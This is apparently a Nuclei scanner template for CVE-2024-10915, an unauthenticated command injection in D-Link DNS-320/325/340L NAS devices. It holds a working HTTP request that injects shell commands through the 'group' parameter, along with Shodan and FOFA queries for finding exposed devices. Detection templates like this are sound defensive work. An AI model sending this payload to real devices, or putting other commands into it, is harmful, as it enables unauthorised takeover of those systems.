id: CVE-2024-10915 info: name: D-Link NAS - Command Injection via Group Parameter author: s4e-io severity: critical description: | A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection. impact: | Unauthenticated attackers can execute arbitrary OS commands via the group parameter, potentially compromising the entire D-Link NAS device. remediation: | Update D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L firmware to versions released after 20241028. reference: - https://www.usom.gov.tr/bildirim/tr-24-1836 - https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4 - https://nvd.nist.gov/vuln/detail/CVE-2024-10915 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-10915 cwe-id: CWE-78,CWE-707 epss-score: 0.94059 epss-percentile: 0.99907 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: dlink product: dns-320_firmware shodan-query: http.html:"sharecenter" fofa-query: body="sharecenter" tags: cve,cve2024,dlink,sharecenter,rce,vuln,vkev http: - raw: - | GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1 Host: {{Hostname}} payloads: command: - "id" - "ifconfig" stop-at-first-match: true matchers-condition: and matchers: - type: dsl dsl: - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)" - "contains_all(body, 'inet addr:', 'Mask:')" condition: or - type: dsl dsl: - 'contains(body, "Content-type: text/html")' - "status_code == 200" condition: and # digest: 4b0a00483046022100f6e4acce262a60bb7abcaf2ff36150fac384066bb448af150a0c72f88f5b5a33022100957e508dd84c0f946191e32285ea8cb69c386a2fa541ac5c8f0c787198b250bd:922c64590222798bb761d5b6d8e72950